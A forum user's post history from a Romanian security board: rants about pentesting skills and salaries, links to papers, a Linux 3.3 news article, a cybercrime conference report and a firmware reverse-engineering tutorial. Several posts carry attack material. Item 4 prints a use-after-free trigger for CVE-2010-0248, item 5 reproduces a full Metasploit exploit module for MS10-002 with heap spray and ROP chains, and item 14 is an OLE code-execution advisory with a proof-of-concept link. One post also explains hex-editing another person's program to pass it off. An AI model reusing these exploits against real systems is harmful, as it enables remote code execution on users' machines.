Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18715

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    Are dreptate, cel putin din perspectiva din care vorbeste, dar aceleasi principii se aplica peste tot. Sa luam exemplu cu SQL Injection. Vine Vasile si gaseste un SQL Injection intr-un site. Bun, asta inseamna ca e "calificat" pentru un post de pentester, sau faptul ca a gasit un rahat de SQL Inection intr-un site il face pentester? NU. Ca sa poti fi un penterster bun trebuie sa stii in primul rand MYSQL. Da, trebuie sa stii limbajul SQL. Si asta ar fi doar o BAZA DE CUNOSTINTE. Nu e deloc de ajuns. Trebuie sa stii SQL Server, sa stii Oracle, sa stii si SQLite, si nu numai ca sisteme de gestiune a bazelor de date, dar si ca vectori de atac si foarte multa administrare. Trebuie sa stii si ASP.NET si Ruby nu doar PHP, pentru ca nu toate site-urile sunt scrise in PHP. Si asta e important, pentru ca pentru pentesting nu vor plati firme de 2 lei, ci vor plati firme mari care NU FOLOSESC MySQL si PHP ci folosesc alte tehnologii: Oracle, ASP.NET... Cati dintre voi (care pretindeti ca stiti PHP si MySQL, dar nu cred ca ati scris mai mult de 1000 de linii de cod in aceste limbaje) cunosteti ASP.NET sau alte tehnologii? Cate linii de cod ati scris pentru a putea afirma ca puteti gasi si FIXA cod vulnerabil? Credeti ca stiind sa folositi un UNION pentru MySQL, sau sa puneti un ../../etc/passwd e de ajuns, gata, va scrieti in frunte PENTESTER? Daca considerati asta, e clar, sunteti limitat grav de tot. Si de vina sunt tutorialele de 2 lei pe care le cititi. De fapt, nu tutorialele, ci faptul ca sunt scurte, si asta e singurul lucru care va convinge sa le cititi, dar va si limiteaza, pentru ca invatand un lucru, nu realizati faptul ca mai sunt inca 1000 care ar trebui stiute, si va considerati niste zei...
  2. Nytro
    Elena?
  3. Nytro
    Deep Dive into OS Internals with Windbg Malware and OS Internals An approach towards reversing malwares, shellcodes and other malicious codes to understand the ways in which they use the OS Internals for their functionality. Preface ............................................................................................................................................................................3Reversing Windows Internals..........................................................................................................................................4 Portable Executable Anatomy.........................................................................................................................................5 Data Directories of Interest.............................................................................................................................................7 Import Directory..............................................................................................................................................................8 Import Address Table....................................................................................................................................................12 Export Directory ............................................................................................................................................................13 Manual Walkthrough of Export Directory.....................................................................................................................14 Process Environment Block...........................................................................................................................................17 Different methods to locate the PEB ............................................................................................................................18 Understanding an Example Shellcode...........................................................................................................................20 Using _PEB_LDR_DATA .................................................................................................................................................20 Using _LDR_DATA_TABLE_ENTRY.................................................................................................................................23 Practical Example with Rustock.B Rootkit.....................................................................................................................25 Conclusion.....................................................................................................................................................................32 References.....................................................................................................................................................................33 Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18576.pdf
  4. Nytro
    Pwn2Own Challenges: Heapsprays are for the 99% BY PETER VREUGDENHIL THU 15 MAR 2012 In case you arent familiar with the Pwn2Own rules this year, we asked people to exploit public bugs... here's one of them. The cve in question (cve-2010-0248) is a use-after-free vulnerability in Internet Explorer 8 found by yours truly back in 2010. This specific bug is triggered by the following poc: <html> <head> <script> function Start() { var TableClone = document.getElementById('tableid').cloneNode(1); var TableCellUrns = TableClone.cells.urns('a'); //var bla = TableClone.cells.item(1); var TableCellUrnsTags = TableCellUrns.tags('a'); TableClone.outerText = 'a'; Result = TableClone.cells; Result = TableCellUrnsTags.item(-1); } </script> </head> <body onLoad="window.setTimeout(Start,100);" id="bodyid"> <table id="tableid"> <tr><th id="thid"></th></tr> <tr id="trid"><td id="tdid"></td></tr> </table> </body> </html> Download here This is also the trigger that we handed out to the contestants at Pwn2Own for the CVE challenges. So if you want to try it out yourself you should probably stop reading right now and just start playing around with it. Articol complet: http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup
  5. Nytro
    [h=1]MS10-002 Internet Explorer Object Memory Use-After-Free[/h] ### This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "MS10-002 Internet Explorer Object Memory Use-After-Free", 'Description' => %q{ This module exploits a vulnerability found in Internet Explorer's mshtml component. Due to the way IE handles objects in memory, it is possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext to be used even after it gets freed, therefore allowing remote code execution under the context of the user. This particular vulnerability was also one of 2012's Pwn2Own challenges, and was later explained by Peter Vreugdenhil with exploitation details. Instead of Peter's method, this module uses heap spraying like the 99% to store a specially crafted memory layout before re-using the freed memory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Peter Vreugdenhil', # Vulnerability discovery and exploit writeup 'juan vazquez', # Metasploit 'sinn3r' # Metasploit ], 'References' => [ [ 'MSB', 'MS10-002'], [ 'CVE', '2010-0248' ], [ 'OSVDB', '61914'], [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-014/'] ], 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'DisableNops' => true }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Ret' => 0x77c15ed5 }, ], [ 'IE 8 on Windows 7 SP0', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7c348b05 } ] ], 'Privileged' => false, 'DisclosureDate' => "Jan 21 2010", 'DefaultTarget' => 0)) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ return targets[1] #IE 8 on Windows XP SP3 elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/ return targets[2] #IE 8 on Windows 7 SP1 with JRE else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] my_target = get_target(agent) # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}") send_not_found(cli) return end js_code = build_javascript(my_target) html = %Q| <html> <head> <script> #{js_code} </script> </head> <body onLoad="window.setTimeout(Start,100);" id="bodyid"> <table id="tableid"> <tr><th id="thid"></th></tr> <tr id="trid"><td id="tdid"></td></tr> </table> </body> </html> | print_status("#{cli.peerhost}:#{cli.peerport} - Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end def build_javascript(my_target) p = get_payload(my_target) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch)) # The exploit will try to take up the freed memory # with a fake item before the reuse fake_item = [ junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, 0x0c0c003c, # pointer to c_table_cell junk, junk, junk, 0x0c0c0050, # pointer to c_cache_item junk, junk, ].pack("V*") fake_item_js = Rex::Text.to_unescape(fake_item) # Here start the crafted layout of the memory # which will be sprayed to get code execution # IE 8 => Spray be sprayed into 0c0c0024 memory_layout = [ junk, junk, junk, junk, junk, junk, 0x0c0c0040, # ----- points to 0x0c0c0040 0x0c0c0c0c, # <---| 0x0c0c0c0c + 0x70: 0x0c0c0c7c will store the stackpivot with eax pointing to 0c0c0c0c junk, junk, 0x00000000, # Allows to bypass CTableCell::GetAAcolSpan junk, # Stored at 0c0c0c50 junk, junk, 0x0c0c0078, junk, junk, junk, junk, junk, 0x0c0c0c50, # <- Stored at 0c0c0074 (0x0c0c0078 - 4) 0x00000001 # Stored at 0c0c0078 (0c0c0050+28) # Allows to exit of CTableRowCellsCollectionCacheItem::GetNext faster ].pack("V*") memory_layout_js = Rex::Text.to_unescape(memory_layout) # Steps: # 1. Force the free. # 2. Try to reuse the freed memory with a fake item. # The fake item store crafted pointers to the # memory which will be sprayed on step 3. # 3. Heap Spray: Shellcode + crafted memory layout to # get execution flow when the memory freed in step 1 # is reused in step 4. # 4. Force the memory reuse. spray = <<-JS function Start() { var fake_items = unescape("#{fake_item_js}"); while (fake_items.length < 0x1000) fake_items+= fake_items; var fake_item = fake_items.substring(0, (96-6)/2); var code = unescape("#{js_code}"); var memory_layout = unescape("#{memory_layout_js}") var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']} - memory_layout.length); var shellcode = memory_layout + offset + code + nops.substring(0, 0x800-#{my_target['Offset']}-code.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block_shell = shellcode.substring(0, (0x80000-6)/2); var heap = new heapLib.ie(0x20000); var TableClone = document.getElementById('tableid').cloneNode(1); var TableCellUrns = TableClone.cells.urns('a'); var bla = TableClone.cells.item(1); var TableCellUrnsTags = TableCellUrns.tags('a'); TableClone.outerText = 'a'; heap.gc(); for(i = 0; i < 30; i++) { heap.alloc(fake_item); } for (var i=1; i < 0x1C2; i++) { heap.alloc(block_shell); } Result = TableClone.cells; Result = TableCellUrnsTags.item(1); } JS spray = heaplib(spray, {:noobfu => true}) return spray end def nop return make_nops(4).unpack("V").first end def junk(n=4) return rand_text_alpha(n).unpack("V").first end # ROP chain + shellcode will be sprayed at 0x0c0c0c0c def get_payload(t) # chain generated by mona.py - See corelan.be case t['Rop'] when :msvcrt rop = [ 0x77c4e392, # POP EAX # RETN 0x77c11120, # <- *&VirtualProtect() 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN junk, 0x77c2dd6c, 0x77c4ec00, # POP EBP # RETN 0x77c35459, # ptr to 'push esp # ret' 0x77c47705, # POP EBX # RETN 0x00000800, # <- change size to mark as executable if needed (-> ebx) 0x77c3ea01, # POP ECX # RETN 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) 0x77c46100, # POP EDI # RETN 0x77c46101, # ROP NOP (-> edi) 0x77c4d680, # POP EDX # RETN 0x00000040, # newProtect (0x40) (-> edx) 0x77c4e392, # POP EAX # RETN nop, # NOPS (-> eax) 0x77c12df9, # PUSHAD # RETN ].pack("V*") when :jre rop = [ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) 0x7c347f98, # RETN (ROP NOP) 0x7c3415a2, # JMP [EAX] 0xffffffff, 0x7c376402, # skip 4 bytes 0x7c351e05, # NEG EAX # RETN 0x7c345255, # INC EBX # FPATAN # RETN 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN 0x7c344f87, # POP EDX # RETN 0xffffffc0, # Value to negate, will become 0x00000040 0x7c351eb1, # NEG EDX # RETN 0x7c34d201, # POP ECX # RETN 0x7c38b001, # &Writable location 0x7c347f97, # POP EAX # RETN 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN 0x7c345c30, # ptr to 'push esp # ret ' ].pack("V*") end code = rop code << make_nops(38) code << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+0x6").encode_string # instr length: 2 bytes code << [t.ret].pack("V") # Stack Pivot code << payload.encoded return code end end =begin (694.cc0): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=00000100 ecx=0241f518 edx=7c90e4f4 esi=7c90d6d0 edi=ffffffff eip=7c8022cf esp=0241f534 ebp=0241f548 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 kernel32!WriteProcessMemory+0x6d: 7c8022cf cc int 3 =end Sursa: MS10-002 Internet Explorer Object Memory Use-After-Free
  6. Nytro
    Da redox, ai dreptate, vad peste tot persoane care vor salarii de 1500-2000 de euro pe luna. Marea majoritate studenti la informatica. La fel, se aplica si ratatilor de pe RST. Ce pula mea stiti voi sa faceti de banii astia? Ce ar trebui sa faca cineva sa ii dati 2000 de euro pe luna? Sa fim seriosi, chiar daca ati avea bani, nici celei mai smechere tarfe nu i-ati da atatia bani, dar cand e vorba de primit toti vreti o gramada de bani si mai vreti pentru nimic. Sa iau exemplul meu clasic: studentii din facultatea mea, informatica. Ce stiu sa faca? Sa suga pula. Nu stiu NICI ce se face la facultate, desi sunt tocilari si iau note mari, daca dupa 2 luni ii intrebi cum se supraincarca operatorul cast in C++ o sa iti vina sa ii iei la palme. Astia nu stiu nici ce e ala HTTP, nu stiu ce inseamna TCP, nu stiu ce un DLL si nu stiu ce face grep, insa cand vine vorba de salarii... "Tati, eu vreau sa fiu programator si sa am 1000 de euro primul salariu, ca eu sunt pula de destept". Asa e si aici. Va credeti toti destepti pentru ca gasiti un XSS/SQLI. Vreti sa deveniti "pentesteri" crezand ca bubuiti de desteptaciune. Si mai presus de toate vreti minim 2000 de euro pentru asta. Sau vreti sa deveniti programatori, si desi NU ATI SCRIS 200 DE LINII DE COD in viata voastra, sa va ofere cineva mii se euro, sa aveti biliard, whisky si tarfe la munca si sa nu lucrati nimic... Treziti-va la realitate...
  7. Nytro

    Decompiler c++

    Nytro replied to usage's topic in Programare

    Ceea ce vrei sa faci se cheama mai putin tehnic "hexat", adica vrei sa iei munca altuia, si sa modifici textele doar. Nu stiu ce cacat contin cacaturile de le folositi voi la scanat, dar probabil sunt programe C compilate. Un decompilator nu o sa te ajute prea mult, mai ales ca din modul de exprimare realizez ca nu sunt tocmai detalii care sa te intereseze. Ca sa intelegi: - invata putin C pe Linux - citeste despre structura executabilelor de pe Linux (cauta "ELF File Format") - vezi ce face un debugger Ca sa nu intelegi nimic si doar sa modifici un text, ceea ce 99% vei face: - cauta un Hex Editor (indiferent ca e pentru Linux sau Windows) - deschide acel fisier executabil - modifica acele texte DAR ai grija ca lungimea textului pe care il introduci sa fie EXACT lungimea textului anterior pentru a nu strica structura executabilului. Poti incerca sa pui un \0 daca ai un text mai scurt, sau te poti risca sa depasesti putin, dar sa nu te miri apoi daca o sa crape programul - trimite apoi programul tuturor si lauda-te cu munca altuia (oricum, probabil persoana de dinaintea ta a procedat la fel), cum ca tu l-ai facut
  8. Nytro
    Locking Down the Windows Kernel: Mitigating Null Pointer Exploitation Tarjei Mandt Norman Threat Research tarjei.mandt @ norman.com Abstract. One of the most prevalent bug classes aecting Windows ker- nel components today is undeniably NULL pointer dereferences. Unlike other platforms such as Linux, Windows (in staying true to backwards compatibility) allows non-privileged users to map the null page within the context of a user process. As kernel and user-mode components share the same virtual address space, an attacker may potentially be able to exploit kernel null dereference vulnerabilities by controlling the deref- erenced data. In this paper, we propose a way to generically mitigate NULL pointer exploitation on Windows by restricting access to the lower portion of process memory using VAD manipulation. Importantly, as the proposed method employs features already present in the memory man- ager and does not introduce any oending hooks, it can be introduced on a wide range of Windows platforms. Additionally, because the mitigation only introduces minor changes at process creation-time, the performance cost is minimal. Keywords: null pointer vulnerabilities, exploitation, mitigation Download: http://www.mista.nu/research/nullpage.pdf
  9. Nytro
    Da, smechera
  10. Nytro
    Misca-te in Real/Carrefour/Cora la raionul cu bauturi...
  11. Nytro
    Dupa ceva timp... Cyber Criminals Selling Millions of U.S military email addresses Yet Another Google Chrome Sandbox Critical Exploit by Turkish security experts Kaspersky finds Malware that resides in your RAM The Linux Tips Exploit For Ms12-020 RDP Bug Moves to Metasploit MS12-002 Microsoft Remote Desktop Use-After-Free DoS MS12-020 Vulnerability for Breakfast Symantec Identifies New Duqu Trojan Driver Variant Address spoofing vulnerability in iOS's Safari Advanced Firewall Configurations with ipset Java Applet Same-Origin Policy Bypass via HTTP Redirect Source Code Spoofing with HTML5 and the LTO Character Debian's x11-common init script weakness (CVE-2012-1093) Portable Executable File Format – A Reverse Engineer View Adobe Photoshop 12.1 Tiff Parsing Use-After-Free Compiling Nmap for Android BackTrack tool review: goofile VIDEO: How to solve the RSA 2012 Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit Debugger Inception – The Scriptable Debugger Within The Debugger Compiling Nmap for Android BackTrack tool review: goofile An interesting case of JRE sandbox breach (CVE-2012-0507) Insecure magazine - RSA Conference Reverse Engineering Firmware: Linksys WAG120N Microsoft OLE for Windows code execution România ?i criminalitatea informatic?, tendin?e What's New in Linux 3.3? Updated: https://www.facebook.com/rstforum
  12. Nytro
    [h=2]What's New in Linux 3.3? [/h] Tuesday, 20 March 2012 10:54 Joe 'Zonker' Brockmeier Sunday, Linus Torvalds released the 3.3 Linux kernel. In the latest installment of the continuing saga of kernel development, we've got more progress towards Android in the kernel, EFI boot support, Open vSwitch, and improvements that should help with the problem of Bufferbloat. Is it just me, or is it still a little weird to be talking about 3.x kernels? It's been about eight months since the official bump to 3.0, but that's compared to more than seven years with the 2.6.x series. At any rate, here we are. Let's take a look at some of the changes in Linux 3.3! [h=3]Everybody was Bufferbloat Fighting![/h] The Android patches are likely to get the most attention in 3.3, but the thing that I'm most excited by? More work going on to solve the Bufferbloat problem. In a nutshell, Bufferbloat is a symptom of a lot of small problems that creates "a huge drag on Internet performance, ironically, by previous attempts to make it work better. Or the one-sentence summary, "bloated buffers lead to network-crippling latency spikes." It's not a problem that's going to be solved all in one go, or in one area. But the Linux kernel is one of the pieces that needs addressing. In the 3.3 release, we've got the ability to set byte queue limits in the kernel. [h=3]Driver Goodies[/h] Check out the list of drivers that have made it out of staging. Specifically, the gma500 driver is out of staging. This means the infamous Poulsbo chipset should be supported in the mainline kernel finally. This release also includes the NVM Express driver (NVMe) which supports solid state disks attached to the PCI-Express bus. Most SSDs are SATA, Fibre Channel or SAS drives. The work was done by Intel's Matthew Wilcox, which isn't surprising since the NVM Express standard is also supported by Intel and a number of other companies. Would love to get my hands on one of these drives to test the 3.3 kernel out... Want to tether your Linux box to your brand new iPhone? The iPhone USB Ethernet Driver (ipeth) module has been updated to add support for the iPhone 4S. The 3.3 kernel also picks up some drivers for third generation Wacom Bamboo tablets and Cintiq 24HD, and initial driver support for the Intuos4. [h=3]Open vSwitch[/h] Another biggie in 3.3? The Open vSwitch project is merging into the kernel tree. It's not new – it's been around for some time – but it's finally making its way into the mainline kernel. (This seems to be a frequent theme, doesn't it?) Basically, Open vSwitch is a virtual switch for complex virtualized server deployments. Given the ever-growing popularity of virtualized servers and cloud deployments, this is something in high demand. As the Open vSwitch page says, "Open vSwitch can operate both as a soft switch running within the hypervisor, and as the control stack for switching silicon. It has been ported to multiple virtualization platforms and switching chipsets. It is the default switch in XenServer 6.0, the Xen Cloud Platform and also supports Xen, KVM, Proxmox VE and VirtualBox. It has also been integrated into many virtual management systems including OpenStack, openQRM, and OpenNebula." No doubt, you'll be reading more about Open vSwitch on Linux.com in the near future. [h=3]Android Comes Closer[/h] Last, but not least, the 3.3 kernel includes nearly complete support for Android. This is good news all around, but isn't really a surprise. The kernel folks have been working on this for a long time. Now the question is, will we start seeing Android apps on top of normal distributions? Will we start seeing standard Linux apps running on Android? Will mod communities, like CyanogenMod, start using the mainline kernel? Should be an interesting year. Then again, when isn't it an interesting year when Linux is involved? As usual, the release includes lots more fixes, new drivers, and so forth. Check out the Kernel Newbies page for more. The merge window for 3.4 is now open, with the traditional two-week cutoff for pull requests. Looking forward to what 3.4 brings! Sursa: https://www.linux.com/news/featured-blogs/196:zonker/556270:whats-new-in-linux-33
  13. Nytro
    [h=1]România ?i criminalitatea informatic?, tendin?e[/h]20 Martie 2012 Ast?zi a avut loc la Banca Na?ional? prima parte a conferin?ei România, încotro? Criminalitatea informatic? în secolul 21, organizat? de Oxygen Events. Sunt câteva concluzii interesante pe care o s? le comentez un pic, mai jos. Prima este c? atacurile informatice devin din ce în ce mai sofisticate, dar asta nu era ceva nou. O noutate ar fi c? autorit??ile nu bat pasul pe loc. Exist? o colaborare direct? cu IGPR, divizia de combatere a criminalit??ii informatice. Exist? un forum de lucru al BNR care trateaz? problemele cybercriminalitate, o comisie inter-bancar? care se ocup? de cazurile cele mai importante care privesc b?ncile, clien?ii sau institu?iile din domeniu. Armin Dinar, risk manager la PriceWaterhouse Coopers, a prezentat un studiu detaliat privind amenin??rile informatice ?i principalele temeri ale companiilor ?i institu?iilor afectate. Nu pierderea banilor era pe primul loc, ci pierderea prestigiului sau a imaginii în industrie. Ioana Vasiu, care a moderat sesiunea de deschidere, a spus c? la ora actual? cybercrimimalitatea atinge 388 miliarde de dolari pe an, aproape de valoarea traficului de droguri la nivel mondial care a fost calculat? anul trecut la 411 miliarde de dolari. “Este clar spre ce anume se mut? industria criminalit??ii”, a subliniat ea. Andrei Petru?, product manager Bitdefender - amenin??rile se mut? în rimt rapid spre terminalele mobile. Sistemele de operare mobile sunt sigure, dar fenomene precum jailbreak ?i decodarea terminalelor deschid calea spre atacuri informatice tot mai periculoase. Cre?terea num?rului de atacuri asupra dispozitivelor mobile în 2011 a fost de 4500%, a ad?ugat el. Via: SecuritateIT Sursa: România ?i criminalitatea informatic?, tendin?e - Securitate IT
  14. Nytro
    Microsoft OLE for Windows code execution ####################################################################### Luigi Auriemma Application: Microsoft OLE for Windows http://www.microsoft.com Versions: ole32.dll < 5.1.2600.6168 Platforms: Windows XP and 2003 before 13 Dec 2011 NOT vulnerable: any other OS from Windows Vista Bug: code execution Exploitation: remote and via file Date: found 16 May 2011 patched 13 Dec 2011 adv/PoC 20 Mar 2012 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org Additional references: http://technet.microsoft.com/en-us/security/bulletin/ms11-093 http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=966 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3400 ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From the iDefense's advisory: "Many Windows applications that support the structured storage file format (Office applications for example) contain support for reading the SummaryInformation stream inside of the OLE document. This stream contains various properties that describe the document (the author for example). In addition to Office, Windows Explorer also supports parsing these streams when a file is clicked and viewed via the preview pane." ####################################################################### ====== 2) Bug ====== First a couple of links about the OLE compound format: http://poi.apache.org/hpsf/internals.html http://msdn.microsoft.com/en-us/library/aa380072%28v=vs.85%29.aspx Example of an HPSF header referred to the provided Visio proof-of-concept: offset bytes description 1200 2 0xfffe 1202 2 0 1204 4 operating system 1208 16 clsid:0 1218 4 1 121c 16 clsid:F29F85E0-4FF9-1068-AB91-08002B27B3D9 122c 4 offset from the 0xfffe header 1230 4 section size 1234 4 number of properties (0xb) 1238 4 property type (for example 2 for title, 4 author and so on) 123c 4 property offset (relative to 0x1230) ... 1288 4 property type 0x11 (VT_CF) used for PID_THUMBNAIL 128c 4 the original was located at offset 1358, now 13da For exploiting the vulnerability it's necessary to use the VT property VT_VERSIONED_STREAM (0x49) which is the cause of the type confusion vulnerability leading to a trivial to exploit code execution. From ole32!CoWaitForMultipleHandles: 7756edcc 8b4708 mov eax,dword ptr [edi+8] 7756edcf 8b4010 mov eax,dword ptr [eax+10h] 7756edd2 8b08 mov ecx,dword ptr [eax] 7756edd4 50 push eax 7756edd5 ff5108 call dword ptr [ecx+8] ; code execution The vulnerability has been tested with PPT, XLS and VSD files with the same effects: - remote exploitation via Internet Explorer, for example if there are Office Viewers installed - automatic exploiting of explorer.exe if the thumbnails previewing of the folder is enabled (if I'm not in error Windows XP has it activated by default) immediately with the opening of the folder where is located the modified PPT file - if the preview mode is not enabled it's necessary to view the properties of the file (right mouse button -> Properties) - the exploitation via the opening of the file may be possible only in some cases (Visio Viewer confirmed) The proof-of-concept should be able to execute calc.exe via Internet Explorer and Visio Viewer, the bug is so trivial to exploit that it's even possible to not use heap spray with some additional work. ####################################################################### =========== 3) The Code =========== Proof-of-concept for Visio Viewer exploitable remotely via Internet Explorer: http://aluigi.org/poc/ole32_1.zip ####################################################################### ====== 4) Fix ====== http://technet.microsoft.com/en-us/security/bulletin/ms11-093 ####################################################################### Sursa: http://aluigi.org/adv/ole32_1-adv.txt
  15. Nytro
    [h=1]Binary Auditor Crackmes/Reversemes[/h] [TABLE] [TR] [TH=bgcolor: #FFF5B0, align: left]Item name:[/TH] [TD]Binary Auditor Crackmes/Reversemes [/TD] [TD=width: 125][TABLE=width: 125] [TR] [TD=width: 125] Currently5/5 1 2 3 4 5 [/TD] [/TR] [TR] [TD=align: center]Rating: 5.0 (1 vote)[/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Author:[/TH] [TD]Dr. TS and REA [/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Home URL:[/TH] [TD=colspan: 2]http://www.binary-auditing.com[/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Last updated:[/TH] [TD=colspan: 2][/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Version (if appl.):[/TH] [TD=colspan: 2]1.001[/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Direct D/L link:[/TH] [TD=colspan: 2]Locally archived copy[/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Description:[/TH] [TD=colspan: 2]The archive of the now defunct binary-auditor website. As far as I know, this is the most recently uploaded compilation. Included in the archive is the beginner guide.[/TD] [/TR] [TR] [TH=bgcolor: #FFF5B0, align: left]Related URLs:[/TH] [TD=colspan: 2]No related URLs have been submitted for this item yet[/TD] [/TR] [/TABLE] Sursa: Binary Auditor Crackmes/Reversemes - Collaborative RCE Knowledge Library Download: http://www.woodmann.com/collaborative/knowledge/images/Bin_Binary_Auditor_Crackmes_Reversemes_2011-2-1_19.17_Binary_Auditor_Lessons.zip
  16. Nytro
    [h=1]Reverse Engineering Firmware: Linksys WAG120N[/h]By Craig | May 29, 2011 | Embedded Systems, Tutorials The ability to analyze a firmware image and extract data from it is extremely useful. It can allow you to analyze an embedded device for bugs, vulnerabilities, or GPL violations without ever having access to the device. In this tutorial, we’ll be examining the firmware update file for the Linksys WAG120N with the intent of finding and extracting the kernel and file system from the firmware image. The firmware image used is for the WAG120N hardware version 1.0, firmware version 1.00.16 (ETSI) Annex B, released on 08/16/2010 and is currently available for download from the Linksys Web site. The first thing to do with a firmware image is to run the Linux file utility against it to make sure it isn’t a standard archive or compressed file. You don’t want to sit down and start analyzing a firmware image only to realize later that it’s just a ZIP file: OK, it’s nothing known to the file utility. Next, let’s do a hex dump and run strings on it: Taking a look at the strings output, we see references to the U-Boot boot loader and the Linux kernel. This is encouraging, as it suggests that this device does in fact run Linux, and U-Boot is a very common and well documented boot loader: However, taking a quick look at the hexdump doesn’t immediately reveal anything interesting: So let’s run binwalk against the firmware image to see what it can identify for us. There are a lot of false positive matches (these will be addressed in the up-coming 0.3.0 release!), but there are a few results that stand out: Binwalk has found two uImage headers (which is the header format used by U-Boot), each of which is immediately followed by an LZMA compressed file. Binwalk breaks out most of the information contained in these uImage headers, including their descriptions: ‘u-boot image’ and ‘MIPS Linux-2.4.31?. It also shows the reported compression type of ‘lzma’. Since each uImage header is followed by LZMA compressed data, this information appears to be legitimate. The LZMA files can be extracted with dd and then decompressed with the lzma utility. Don’t worry about specifying a size limit when running dd; any trailing garbage will be ignored by lzma during decompression: We are now left with the decompressed files ‘uboot’ and ‘kernel’. Running strings against them confirms that they are in fact the U-Boot and Linux kernel images: We’ve got the kernel and the boot loader images, now all that’s left is finding and extracting the file system. Since binwalk didn’t find any file systems that looked legitimate, we’re going to have to do some digging of our own. Let’s run strings against the extracted Linux kernel and grep the output for any file system references; this might give us a hint as to what file system(s) we should be looking for: Ah! SquashFS is a very common embedded file system. Although binwalk has several SquashFS signatures, it is not uncommon to find variations of the ‘sqsh’ magic string (which indicates the beginning of a SquashFS image), so what we may be looking for here is a non-standard SquashFS signature inside the firmware file. So how do we find an unknown signature inside a 4MB binary file? Different sections inside of firmware images are often aligned to a certain size. This often means that there will have to be some padding between sections, as the size of each section will almost certainly not fall exactly on this alignment boundary. An easy way to find these padded sections is to search for lines in our hexdump output that start with an asterisk (‘*’). When hexdump sees the same bytes repeated many times, it simply replaces those bytes with an asterisk to indicate that the last line was repeated many times. A good place to start looking for a file system inside a firmware image is immediately after these padded sections of data, as the start of the file system will likely need to fall on one of these aligned boundaries. There are a couple interesting sections that contain the string ‘sErCoMm’. This could be something, but given the small size of some of these sections and the fact that they don’t appear to have anything to do with SquashFS, it is unlikely: There are some other sections as well, but again, these are very small, much too small to be a file system: Then we come across this section, which has the string ‘sqlz’ : The standard SquashFS image starts with ‘sqsh’, but we’ve already seen that the firmware developers have used LZMA compression elsewhere in this image. Also, most firmware that uses SquashFS tends to use LZMA compression instead of the standard zlib compression. So this signature could be a modified SquashFS signature that is a concatination of ‘sq’ (SQuashfs) and ‘lz’ (LZma). Let’s extract it with dd and take a look: Of course, ‘sqlz’ is not a standard signature, so the file utility still doesn’t recognize our extracted data. Let’s try editing the ‘sqlz’ string to read ‘sqsh’: Running file against our modified SquashFS image gives us much better results: This definitely looks like a valid SquashFS image! But due to the LZMA compression and the older SquashFS version (2.1), you won’t be able to extract any files from it using the standard SquashFS tools. However, using the unsquashfs-2.1 utility included in Jeremy Collake’s firmware mod kit works perfectly: Now that we know this works, we should go ahead and add this new signature to binwalk so that it will identify the ‘sqlz’ magic string in the future. Adding this new signature is as easy as opening binwalk’s magic file (/etc/binwalk/magic), copy/pasting the ‘sqsh’ signature and changing the ‘sqsh’ to ‘sqlz’: Re-running binwalk against the original firmware image, we see that it now correctly identifies the SquashFS entry: And there you have it. We successfully identified and extracted the boot loader, kernel and file system from this firmware image, plus we have a new SquashFS signature to boot! Sursa: Reverse Engineering Firmware: Linksys WAG120N | /dev/ttyS0
